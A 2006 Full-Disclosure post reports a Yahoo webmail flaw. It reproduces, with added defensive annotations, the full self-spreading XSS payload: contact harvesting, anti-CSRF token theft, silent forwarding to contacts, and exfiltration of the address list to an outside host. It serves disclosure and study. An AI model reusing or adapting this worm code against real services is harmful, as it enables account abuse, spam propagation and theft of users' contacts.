[Full-disclosure] Vulnerability in yahoo webmail.
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Vulnerability in yahoo webmail.
- From: "David Loyall" <david.loyall@xxxxxxxxx>
- Date: Sun, 11 Jun 2006 23:35:13 -0500
Hello, all.
I just received an email with an html attachment, on a yahoo account.
When I opened the mail, yahoo automatically displayed the html, and executed
the code within. What the hell. =) It forwarded the message to my contacts
list (or some other set of addresses, dunno) and redirected my browser to
a website.
I'm off to a BBQ, and I don't care about yahoo. So I'm not even going to
read the code and see how this happens. I'm attaching the html file as a
text file. Enjoy!
Oh, I've CC'd abuse@xxxxxxxxx, but if someone else would give them a proper
write-up, and encourage them to close the hole, that'd be wonderful.
Cheers,
--David Loyall
Omaha, Nebraska
David Loyall <http://david.loyall.googlepages.com>
<!--
  Reviewer analysis (defender stance). The payload below is kept byte for byte as posted; only comments are added.
  Vulnerability class: stored XSS via an HTML attachment that the webmail rendered inline, in the mail origin,
  with the img onload handler still executable. The script therefore runs with the victim's authenticated session.
  The stray target="" fragments before onload and onreadystatechange look like artefacts of the provider's
  filter, which seems to have tried to neutralise the handler and failed (inference, not visible in the code).
  Chain as written: (1) fetch the QuickBuilder page and scrape addresses ending in yahoo.com or yahoogroups.com;
  (2) fetch the Compose page and read the hidden .crumb field, the anti-CSRF token, which any same-origin
  script can read, so XSS defeats CSRF protection by construction; (3) POST a forward of the currently open
  message (FwdMsg=Mid) to the first harvested address with the rest in Bcc, i.e. self-propagation, with
  SaveCopy=no so nothing appears in the Sent folder; (4) send the browser to a third-party host with the
  harvested list in the query string, i.e. exfiltration of the address book.
  Mitigation for a provider: do not render attachments inline in the session origin (serve them from a
  separate, cookieless origin), strip every on* attribute, and today a CSP that forbids inline handlers.
  Detection angle (inferred): Compose POSTs carrying FwdMsg from sessions that never loaded the compose UI,
  and outbound referrals to the exfiltration host.
-->
<img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif'
target=""onload="var http_request = false; var Email = ''; var IDList =
''; var CRumb = ''; /* XHR helper: Func is installed as the readystatechange callback, Param is the POST body (null for GET) */ function makeRequest(url, Func, Method, Param) {
if (window.XMLHttpRequest) { http_request = new XMLHttpRequest();
} else if (window.ActiveXObject) { http_request = new
ActiveXObject('Microsoft.XMLHTTP'); }
http_request.target=""onreadystatechange = Func; /* the inserted target fragment is the same filter artefact as on the img tag (inferred) */
http_request.open(Method, url, true); if( Method == 'GET')
http_request.send(null); else http_request.send(Param);
} /* opens a decoy window (the comma in the host name is as posted); url0 is not defined in this payload, presumably a global of the webmail page; the us.N.mail.yahoo.com server name is cut out of it */ window.open('http://www,lastdata.com'); ServerUrl = url0;USIndex =
ServerUrl.indexOf('us.' ,0);MailIndex = ServerUrl.indexOf('.mail' ,0);CutLen =
MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen);
/* GetIDs: walks the table cells of the fetched contact-list HTML and collects every cell containing @yahoo.com or @yahoogroups.com into the comma-separated global IDList */
function GetIDs(HtmlContent) { IDList = '';
StartString = ' <td>'; EndString = '</td>';
i = 0; StartIndex =
HtmlContent.indexOf(StartString, 0); while(StartIndex >= 0)
{ EndIndex = HtmlContent.indexOf(EndString,
StartIndex); CutLen = EndIndex - StartIndex -
StartString.length; YahooID = HtmlContent.substr(StartIndex
+ StartString.length, CutLen);
if( YahooID.indexOf('@yahoo.com', 0) > 0 || YahooID.indexOf('@yahoogroups.com',
0) > 0 ) IDList = IDList + ',' + YahooID ;
StartString = '</tr>'; StartIndex =
HtmlContent.indexOf(StartString, StartIndex + 20); StartString
= ' <td>'; StartIndex =
HtmlContent.indexOf(StartString, StartIndex + 20); i++;
} if(IDList.substr(0,1) == ',')
IDList = IDList.substr(1, IDList.length);
/* the first harvested address becomes the To recipient (global Email); the remainder stays in IDList and is later placed in Bcc */
if(IDList.indexOf(',', 0)>0 ) {
IDListArray = IDList.split(','); Email = IDListArray[0];
IDList = IDList.replace(Email + ',', '');
} /* spamform.NE and showLetter.FromAddress are form fields of the webmail page, not defined here; presumably the victim's own addresses, which are removed from the list */ CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ',', '');
IDList = IDList.replace(',' + CurEmail, '');IDList = IDList.replace(CurEmail,
'');UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(',' +
UserEmail, '');IDList = IDList.replace(UserEmail + ',', '');IDList =
IDList.replace(UserEmail, ''); return IDList; } /* stage 1 callback: on HTTP 200 harvest the list from the response, then fetch the Compose page so the anti-CSRF token can be read */ function
ListContacts() { if (http_request.readyState == 4) { if
(http_request.status == 200) { HtmlContent =
http_request.responseText; IDList = GetIDs(HtmlContent);
makeRequest('http://us.' +
Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET',
null); } } } /* ExtractStr: returns the value of the hidden .crumb input; \u0022 is the double-quote escape, presumably so the literal does not terminate the onload attribute */ function ExtractStr(HtmlContent) {
StartString = 'name=\u0022.crumb\u0022 value=\u0022';
EndString = '\u0022'; i = 0; StartIndex =
HtmlContent.indexOf(StartString, 0); EndIndex =
HtmlContent.indexOf(EndString, StartIndex + StartString.length );
CutLen = EndIndex - StartIndex - StartString.length; crumb =
HtmlContent.substr(StartIndex + StartString.length , CutLen ); return
crumb; } /* stage 2 callback: reads the token, builds the Compose POST body and submits it */ function Getcrumb() { if (http_request.readyState ==
4) { if (http_request.status == 200) {
HtmlContent = http_request.responseText; CRumb =
ExtractStr(HtmlContent); MyBody
= 'this is test'; MySubj = 'New Graphic Site';
Url = 'http://us.' + Server +
'.mail.yahoo.com/ym/Compose';
/* compose.action is the action URL of the page's compose form (not defined here); the Mid (message id) and box (folder) query values are cut out of it so the message currently being viewed is the one forwarded */ var ComposeAction = compose.action;MidIndex =
ComposeAction.indexOf('&Mid=' ,0);incIndex = ComposeAction.indexOf('&inc'
,0);CutLen = incIndex - MidIndex - 5;var MyMid = ComposeAction.substr(MidIndex
+ 5, CutLen); QIndex = ComposeAction.indexOf('?box=' ,0);AIndex =
ComposeAction.indexOf('&Mid' ,0);CutLen = AIndex - QIndex - 5;var BoxName =
ComposeAction.substr(QIndex + 5, CutLen); Param =
/* canned Compose form body with placeholders: FwdFile/FwdMsg make it a forward of the open message, Bcc carries the harvested list, SaveCopy=no keeps it out of the Sent folder, PlainMsg/Body are fixed text */
'SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=&.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+message+attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save+as+a+Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+forwarded+message+attached.&Format=html&sendbottom=Send&savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&cancelbottom=Cancel';
/* String.replace with a string pattern replaces only the first occurrence, hence the repeated EMAILSUBJ (3 occurrences) and EMAILMID (2) calls; EMAILBODY and PlainMESSAGE do not occur in Param, so those two replaces are no-ops; the OriginalFrom value is a hard-coded address (redacted in the post) */
Param = Param.replace('BOXNAME', BoxName); Param =
Param.replace('RUMBVAL', CRumb); Param =
Param.replace('BCCLIST', IDList); Param =
Param.replace('TOEMAIL', Email);Param = Param.replace('FROMEMAIL',
'av3@xxxxxxxxx'); Param = Param.replace('EMAILBODY',
MyBody); Param = Param.replace('PlainMESSAGE', '');
Param = Param.replace('EMAILSUBJ', MySubj);Param=
Param.replace('EMAILSUBJ', MySubj);Param = Param.replace('EMAILSUBJ', MySubj);
Param = Param.replace('EMAILMID', MyMid);Param =
Param.replace('EMAILMID', MyMid);makeRequest(Url , alertContents, 'POST',
Param); } }} /* stage 3 callback: once the send request completes (status is not checked), navigate the browser to a third-party host with the harvested list in the URL, i.e. exfiltration; window.navigate is IE-only */ function alertContents() { if
(http_request.readyState == 4) {
window.navigate('http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList='
+ IDList) } } /* entry point: fetch the QuickBuilder page (presumably the address-book export, numadr=100) and start the chain with ListContacts */ makeRequest('http://us.' + Server +
'.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd='
+ Math.random(), ListContacts, 'GET', null)">Please wait while loading the site
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/